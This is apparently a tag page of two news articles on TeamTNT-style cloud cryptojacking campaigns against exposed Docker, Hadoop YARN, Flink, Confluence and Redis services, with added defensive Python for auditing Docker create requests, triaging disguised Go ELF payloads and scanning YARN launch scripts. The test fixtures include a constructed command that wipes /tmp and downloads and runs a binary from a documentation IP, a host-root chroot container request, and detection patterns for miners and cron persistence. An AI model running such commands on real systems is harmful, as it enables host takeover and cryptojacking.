Tag: TeamTNT

  • Confluence, Docker, More: Malware Targets Your Servers

    Security researchers have recently observed an uptick in attacks against misconfigured cloud servers running Apache Hadoop, Docker, Confluence, and Redis.

    In one of these attacks, the operators deployed novel Golang-based malware that automates both the search for vulnerable hosts and their subsequent compromise.

    Cado Security, a firm specializing in cloud forensics and incident response, uncovered a malicious operation that used purpose-built tools to exploit these exposed services and execute arbitrary code on them.

    The toolkit used by hackers reminded researchers of previous operations, bearing similarities to cloud malware campaigns by TeamTNT, WatchDog, and Kiss-a-Dog.

    [Figure: Wireshark capture of the Docker Engine API traffic, including the initial access commands]

    Targets are selected by scanning for open ports 2375 (Docker Engine API), 8088 (Hadoop YARN ResourceManager), 8090 (Confluence), and 6379 (Redis), the default ports of the four services.

    Cado Security detected the attack when one of its Docker Engine API honeypots alerted on an access attempt in which a new Alpine Linux container was created on the host.
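    Because the initial access here is nothing more than an HTTP request to an exposed Docker Engine API, the request body itself is the best place to spot it. The following Python check is an added example, not code from Cado Security or from this page: it inspects a /containers/create body for the settings that turn a new container into host access (privileged mode, host namespaces, bind mounts of sensitive host paths, dangerous capabilities, chroot or nsenter in the command). The two sample requests are constructed (an alpine container as in the incident, one with a host-root bind mount and one ordinary) and are not the honeypot capture.

```python
"""Audit a Docker Engine API /containers/create request body for host-escape settings.

Added example for this page (not code from the Cado Security write-up). An
exposed daemon on tcp/2375 accepts this JSON from anyone; the fields below are
what distinguish "start a container" from "take over the host".
"""
import json

# Host paths that, bind-mounted into a container, hand over the host.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/dev", "/sys", "/var/run/docker.sock", "/run/docker.sock")
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "SYS_RAWIO", "DAC_READ_SEARCH"}


def _words(value) -> list:
    """Cmd/Entrypoint may be a string or a list in the Docker API; normalize to a list."""
    if value is None:
        return []
    return value.split() if isinstance(value, str) else list(value)


def _is_sensitive(host_path: str) -> bool:
    if host_path == "/":
        return True
    return any(host_path == p or host_path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_container_create(body: str) -> list:
    """Return human-readable findings for one /containers/create JSON body."""
    spec = json.loads(body)
    host = spec.get("HostConfig") or {}
    findings = []
    if host.get("Privileged"):
        findings.append("Privileged=true (all capabilities, no device cgroup restrictions)")
    for mode in ("PidMode", "NetworkMode", "IpcMode"):
        if host.get(mode) == "host":
            findings.append(f"{mode}=host shares the host's namespace")
    for bind in host.get("Binds") or []:
        src = bind.split(":", 1)[0]  # Binds entries are host_path:container_path[:options]
        if _is_sensitive(src):
            findings.append(f"bind-mounts sensitive host path {src}")
    for mnt in host.get("Mounts") or []:  # newer mount syntax carries the same risk
        if mnt.get("Type") == "bind" and _is_sensitive(mnt.get("Source", "")):
            findings.append(f"bind-mounts sensitive host path {mnt['Source']}")
    for cap in host.get("CapAdd") or []:
        if cap.upper().removeprefix("CAP_") in DANGEROUS_CAPS:
            findings.append(f"adds capability {cap}")
    command = _words(spec.get("Entrypoint")) + _words(spec.get("Cmd"))
    if any(tok in ("chroot", "nsenter") for tok in command):
        findings.append("command uses chroot/nsenter to break out into the host")
    return findings


# Constructed samples (not the honeypot capture): a takeover-style create request
# and an ordinary one, both using the alpine image as in the incident.
ATTACK_REQUEST = json.dumps({
    "Image": "alpine",
    "Cmd": ["chroot", "/mnt", "sh", "-c", "id"],
    "HostConfig": {"Binds": ["/:/mnt"]},
})
BENIGN_REQUEST = json.dumps({
    "Image": "alpine",
    "Cmd": ["sleep", "300"],
    "HostConfig": {"Binds": ["/srv/app/data:/data:ro"]},
})

if __name__ == "__main__":
    for label, req in (("attack", ATTACK_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, audit_container_create(req) or ["no findings"])
```

    The same checks apply wherever you can see the create request: a honeypot, a reverse proxy in front of the daemon, or the daemon's own debug log. The more fundamental fix is not to expose tcp/2375 at all; if remote access is needed, use TLS client authentication on 2376.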

    From there, the attackers used several shell scripts and fairly generic Linux attack techniques to install cryptocurrency mining software, establish persistence, and set up a reverse shell.

    In the examined attack, the operators deployed a set of four Golang payloads that identify and exploit hosts running Hadoop YARN (h.sh), Docker (d.sh), Confluence (w.sh), and Redis (c.sh).

    The payload names look like an unsuccessful attempt to pass them off as bash scripts; in reality they are 64-bit Golang ELF binaries.

    “All of these payloads are 64-bit Golang ELF binaries. Interestingly, the malware developer neglected to strip the binaries, leaving DWARF debug information intact. There has been no effort made to obfuscate strings or other sensitive data within the binaries either, making them trivial to reverse engineer,” noted the experts at Cado Security.
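    The mismatch between the .sh names and the ELF contents, and the unstripped symbols and DWARF data the quote above describes, are both things a triage script can check without executing anything. The Python below is an added example (not part of the Cado report or this page): a minimal ELF64 section-header parser that reports whether a file claiming to be a shell script is really an ELF, whether it carries Go's .gopclntab/.go.buildinfo sections, and whether .symtab and .debug_* sections survive. The build_fake_elf fixture and its section lists are constructed so the example runs offline; point triage_path at real files to use it.

```python
"""Triage files that are named like shell scripts but are really ELF binaries.

Added example for this page (not from the Cado Security report). It parses
just enough of an ELF64 file, the section header table and its name string
table, to answer three questions about h.sh-style payloads: is this an ELF at
all, is it a Go binary, and has it been stripped of symbols and DWARF data.
"""
import struct

ELF_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
SECTION_HEADER = struct.Struct("<IIQQQQIIQQ")      # Elf64_Shdr
GO_SECTIONS = {".gopclntab", ".go.buildinfo", ".gosymtab"}


def elf_section_names(data: bytes) -> list:
    """Return the section names of a little-endian ELF64 image held in memory."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    fields = ELF_HEADER.unpack_from(data, 0)
    shoff, shentsize, shnum, shstrndx = fields[6], fields[11], fields[12], fields[13]
    headers = [SECTION_HEADER.unpack_from(data, shoff + i * shentsize) for i in range(shnum)]
    str_off, str_size = headers[shstrndx][4], headers[shstrndx][5]   # sh_offset, sh_size of .shstrtab
    strtab = data[str_off:str_off + str_size]
    names = []
    for hdr in headers:
        start = hdr[0]                                 # sh_name: offset into .shstrtab
        names.append(strtab[start:strtab.index(b"\x00", start)].decode())
    return names


def triage(filename: str, data: bytes) -> dict:
    """Compare what the name claims with what the bytes are."""
    report = {"claims_shell_script": filename.endswith(".sh"),
              "is_elf": data[:4] == b"\x7fELF",
              "go_binary": False, "stripped": None, "has_dwarf": False}
    if not report["is_elf"]:
        return report
    names = set(elf_section_names(data))
    report["go_binary"] = bool(names & GO_SECTIONS)
    report["stripped"] = ".symtab" not in names                          # strip / -ldflags=-s remove it
    report["has_dwarf"] = any(n.startswith(".debug_") for n in names)   # -ldflags=-w removes these
    return report


def triage_path(path: str) -> dict:
    with open(path, "rb") as fh:
        return triage(path, fh.read())


def build_fake_elf(section_names: list) -> bytes:
    """Constructed fixture: a header-only ELF64 carrying the given (empty) sections."""
    shstrtab, name_offsets = b"\x00", []
    for name in section_names:
        name_offsets.append(len(shstrtab))
        shstrtab += name.encode() + b"\x00"
    shstr_name_off = len(shstrtab)
    shstrtab += b".shstrtab\x00"
    str_off = ELF_HEADER.size                          # string table sits right after the header
    shoff = str_off + len(shstrtab)                    # section headers follow the string table
    shdrs = [SECTION_HEADER.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)]                            # SHT_NULL
    shdrs += [SECTION_HEADER.pack(off, 1, 0, 0, 0, 0, 0, 0, 1, 0) for off in name_offsets]  # SHT_PROGBITS
    shdrs.append(SECTION_HEADER.pack(shstr_name_off, 3, 0, 0, str_off, len(shstrtab), 0, 0, 1, 0))  # SHT_STRTAB
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, little-endian, EV_CURRENT
    header = ELF_HEADER.pack(ident, 2, 62, 1, 0, 0, shoff, 0, ELF_HEADER.size, 0, 0,
                             SECTION_HEADER.size, len(shdrs), len(shdrs) - 1)  # ET_EXEC, EM_X86_64
    return header + shstrtab + b"".join(shdrs)


# Constructed samples standing in for h.sh/d.sh: one unstripped Go build, one stripped.
UNSTRIPPED_GO = build_fake_elf([".text", ".gopclntab", ".go.buildinfo", ".symtab", ".debug_info", ".debug_line"])
STRIPPED_GO = build_fake_elf([".text", ".gopclntab", ".go.buildinfo"])
REAL_SCRIPT = b"#!/bin/sh\necho hello\n"

if __name__ == "__main__":
    for name, blob in (("h.sh", UNSTRIPPED_GO), ("d.sh", STRIPPED_GO), ("setup.sh", REAL_SCRIPT)):
        print(name, triage(name, blob))
```

    A stripped Go binary still keeps .gopclntab (the runtime needs it), so the Go fingerprint survives stripping; .symtab and .debug_* do not. A report that says claims_shell_script, is_elf, go_binary and has_dwarf all true is exactly the profile the quote describes.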

    The attack also employed other payloads aimed at erasing traces of initial access and complicating investigation efforts.

    While most payloads in the campaign are detected by antivirus engines on VirusTotal, the four Golang binaries mentioned above are barely detected at all.

    As this operation shows, misconfigured cloud services and systems are increasingly easy targets for criminals who use malware to automate their attacks.

    Companies must pay close attention to the security of their cloud resources, regularly review configurations for weaknesses, promptly install security updates, and, for the services above, never expose management interfaces such as the Docker Engine API, the YARN ResourceManager, or Redis to the internet without authentication.

  • Apache Hadoop & Flink Hacked: Rootkits Lurk Beneath “Invisible” Malware

    Cybersecurity researchers have identified a new attack that exploits misconfigurations in Apache Hadoop and Apache Flink to deploy cryptocurrency miners on target systems.

    “This attack is particularly intriguing due to the attacker’s use of packers and rootkits to conceal the malware,” note researchers from Aqua Security in their report published on January 8th. The malware erases the contents of specific directories and alters system configurations to evade detection.

    [Figure: The attack flow]

    The infection chain for Apache Hadoop exploits a misconfiguration in the YARN (Yet Another Resource Negotiator) resource manager, responsible for tracking resources in the cluster and scheduling applications.

    Specifically, the misconfiguration allows a remote, unauthenticated attacker to execute arbitrary code through a specially crafted HTTP request; the code runs with whatever privileges the YARN user has on the node where the container is launched.

    Similar attacks on Apache Flink target a comparable misconfiguration: a Flink dashboard or REST API reachable without authentication accepts uploaded JARs and runs them, giving a remote attacker code execution without any credentials.

    These vulnerabilities are not new and have previously been exploited by financially motivated groups such as TeamTNT, known for their attacks on Docker and Kubernetes for cryptojacking and other malicious activities.

    Nevertheless, the latest attacks are notable for their use of rootkits to conceal cryptocurrency mining processes following the initial penetration of Hadoop and Flink applications.

    First, the attacker sends an unauthenticated request to the ResourceManager REST API (POST /ws/v1/cluster/apps/new-application) to obtain a new application ID, then a second POST to /ws/v1/cluster/apps that submits the application together with the command it should launch.

    This command is designed to clear the /tmp directory of all existing files, download a file named “dca” from a remote server, execute it, and then repeat the deletion of all files in the /tmp directory.

    The executed code is a packed ELF binary, which downloads two rootkits and a Monero miner binary file. To achieve persistence, a cron job is created to download and execute a shell script that deploys the “dca” binary file.
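    The launch command an attacker submits through the YARN REST API does not vanish after it runs: the NodeManager writes it into launch_container.sh inside the container's local directory (by default under the yarn.nodemanager.local-dirs path, in usercache/<user>/appcache/<application id>/<container id>/), and unauthenticated REST submissions arrive as Hadoop's default HTTP user dr.who. The Python below is an added example, not code from the Aqua Security report or this page: it scans such scripts for the sequence described above (wipe /tmp, fetch from a raw IP, mark executable, run from /tmp, wipe again) plus cron and miner indicators, and can walk the NodeManager local directories. Both sample scripts and the 203.0.113.10 address are constructed.

```python
"""Triage YARN container launch scripts for the /tmp wipe-download-run pattern.

Added example for this page (not from the Aqua Security report). Whatever
command an attacker submits through the ResourceManager REST API ends up in
launch_container.sh inside the container's local directory on the NodeManager,
so those files are a cheap place to look for this campaign's tradecraft.
"""
import os
import re

SCRATCH = r"/(?:tmp|var/tmp|dev/shm)/"

# Each indicator is one observable step of the command described in the write-up.
INDICATORS = {
    "wipes_tmp":             re.compile(r"\brm\s+-(?:rf|fr|r)\s+/tmp(?:/\*|\b)"),
    "downloads_from_ip":     re.compile(r"\b(?:curl|wget)\b[^;|&\n]*https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "marks_executable":      re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+" + SCRATCH),
    "executes_from_scratch": re.compile(r"(?:^|[;&|]\s*)" + SCRATCH + r"[^\s;|&]+", re.MULTILINE),
    "cron_persistence":      re.compile(r"\bcrontab\b|/etc/cron\.|/var/spool/cron"),
    "miner_arguments":       re.compile(r"stratum\+tcp://|--donate-level|\bxmrig\b"),
    # Unauthenticated REST submissions run as Hadoop's default HTTP user.
    "submitted_as_dr_who":   re.compile(r"usercache/dr\.who/"),
}


def triage_launch_script(text: str) -> dict:
    """Map each matched indicator name to the snippet that triggered it."""
    hits = {}
    for name, rx in INDICATORS.items():
        match = rx.search(text)
        if match:
            hits[name] = match.group(0).strip()
    return hits


def is_suspicious(text: str, threshold: int = 2) -> bool:
    """Two independent indicators is a reasonable bar; one alone is often noise."""
    return len(triage_launch_script(text)) >= threshold


def scan_local_dirs(*roots: str) -> dict:
    """Walk yarn.nodemanager.local-dirs and return {path: hits} for suspicious launch scripts."""
    results = {}
    for root in roots:
        for dirpath, _, files in os.walk(root):
            if "launch_container.sh" in files:
                path = os.path.join(dirpath, "launch_container.sh")
                with open(path, errors="replace") as fh:
                    text = fh.read()
                if is_suspicious(text):
                    results[path] = triage_launch_script(text)
    return results


# Constructed samples (the IP is a documentation address, not the real download server).
MALICIOUS_SCRIPT = """#!/bin/bash
export LOCAL_DIRS="/hadoop/yarn/local/usercache/dr.who/appcache/application_1700000000000_0007"
exec /bin/bash -c "rm -rf /tmp/*; curl -s http://203.0.113.10/dca -o /tmp/dca; chmod +x /tmp/dca; /tmp/dca; rm -rf /tmp/*"
"""
BENIGN_SCRIPT = """#!/bin/bash
export LOCAL_DIRS="/hadoop/yarn/local/usercache/hive/appcache/application_1700000000000_0008"
exec /bin/bash -c "$JAVA_HOME/bin/java -Xmx1024m org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1>/stdout 2>/stderr"
"""

if __name__ == "__main__":
    for label, script in (("malicious", MALICIOUS_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, triage_launch_script(script))
```

    The same indicator set works on the shell script the cron job fetches for persistence, since it repeats the download-and-run step; the dr.who check is the cheapest signal of all, because a cluster with authentication enabled never schedules work under that user.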

    Analysis of the perpetrator’s infrastructure reveals that the server for downloading the payload was registered on October 31, 2023.

    As a risk mitigation measure, organizations are advised to deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, and other suspicious activity, and, more fundamentally, to keep the YARN ResourceManager and Flink REST interfaces off the public internet and behind authentication.